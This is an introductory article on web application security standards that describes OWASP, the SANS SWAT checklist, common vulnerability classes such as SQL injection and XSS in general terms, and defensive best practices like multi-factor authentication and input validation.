Securing Web Applications Standards and Vulnerabilties
A web application runs on a server and is accessed by users through an active internet connection. Users submit requests through a browser or user interface (UI), then the web application server performs the task or carries out the request.
Web applications are widely used today and provide the front-end for a vast array of online tools and platforms. Web applications can include anything from email platforms, Google applications, online forms, word editors, and online databases. Nearly every industrial sector uses a form of web application in their regular operations. The wide distribution of web applications makes for a large attack surface, and the potential of them housing sensitive information makes them a popular target for attack. Web applications are often more vulnerable than an operating system or other network hardware. Therefore, establishing some form of security standards for web application use or web application development is essential if we continue the trend of heavy use. There must be a consensus for the most effective web application attacks to secure web applications properly. Sequentially, there needs to be established standards and best practices for web applications to address these vulnerabilities. This is best met with the OWASP Top 10 and the SANS SWAT checklist.
Establishing standards for web application security is the best way to prevent the potential for web application attacks. Simply put, if the major flaws in software development are identified, and a “norm” is established, it will be significantly easier to mitigate these vulnerabilities and therefore have a smaller attack surface.
The Open Web Application Security Project (OWASP) is an open-source community designed to secure the web through tools, networking, and education. OWASP fosters tens of thousands of members and hosts several open-source projects and conferences. Everything put out by OWASP is free to those interested in improving application security. OWASP is the go-to source for current trends in web application defense.
Securing Web Application Technologies (SWAT) checklists are frequently used as a reference for developers to follow when building and testing web applications. A SWAT checklist is beneficial because it contains extremely specific mitigations for Common Weakness Enumerations (CWEs).
Establishing these types of standards moving forward in web application development will further reduce the risk of exploitation. Leaders in this field such as OWASP and SANS continue to make this information open-source with the purpose of web applications becoming more secure.
Web Application Vulnerabilities
Major web application vulnerabilities have led to a wide range of exploits. Among the several flaws found in web applications, some of the most exploited include:
- Broken Authentication/Access Control- Proving the identity of an application user is the process of authentication. Therefore, broken authentication could lead to compromised passwords, keys, and tokens. Broken or improper access control indicates that certain users have access or privileges that they should not.
- SQL(Structured Query Language) Injection- The insertion of a SQL query to an application’s database sent from the client-side to the back-end of a web application. A successful SQL injection will allow an attacker to access data that they should not access, such as passwords, financial credentials, and other sensitive information.
- Cross-Site Scripting (XSS)- Injection of code or script into a web application. An attacker typically uses a trusted source to send malicious code on the user-end. This can compromise the victim’s cookies, session tokens, and other information stored by the browser or application.
- Data Exposure/System Misconfigurations- This is the obvious unprotection of sensitive data within an application. This can include anything from financial credentials, health information, and personally identifiable information. Misconfigurations occur when default credentials are kept, sensitive data is exposed in error messages, or due to open cloud storage, etc. Incorrect configurations are extremely common and can lead to sensitive data exposure.
Mitigating Vulnerabilities and Best Practice
Properly securing web applications requires development with security in mind. In other words, software and application developers should start implementing security measures from when they start a project. The SWAT checklist is a major reference to this phase of securing web applications. SWAT is separated into seven main categories making it the most thorough checklist in building application defense. These seven categories include:
- Error Handling and Logging
- Data Protection
- Configurations and Operations
- Session Management
- Input and Output Handling
- Access Control
When possible, web applications should use multi-factor authentication and set long/complex password requirements. This will require more than one means of proving a user’s identity and strengthening their passwords. Web applications that lockout users after a specified number of login attempts are more secure as well. Moreover, there need to be clearly defined roles for users once they are authenticated. Users should only be able to access and take actions that they are authorized to do. Another basic requirement is input validation. This is done to ensure only the correct data is entering the application.
To reiterate, many of these defensive measures are relatively simple when implemented from the beginning of web application development. Taking the time to apply application security to software development is the best way to ensure a secure web application. Nonetheless, the specified procedures will reduce the attack surface of web applications. A reduced attack surface and reduced risk make for a more secure app, but it will only stay secure when properly maintained and updated. The widespread adoption of web applications has made them popular targets, and the establishment of solid defensive practices is essential, now more than ever.
References N.A. (2018). Secure coding best practices handbook. (). Retrieved from https://info.veracode.com/secure-coding-best-practices-hand-book-guide-resource.html OWASP. (2020). OWASP top ten web application security risks | OWASP. Retrieved from https://owasp.org/www-project-top-ten/ SANS Institute. (N.A.). Securing web application technologies : [SWAT] checklist. Retrieved from https://www.sans.org/cloud-security/securing-web-application-technologies/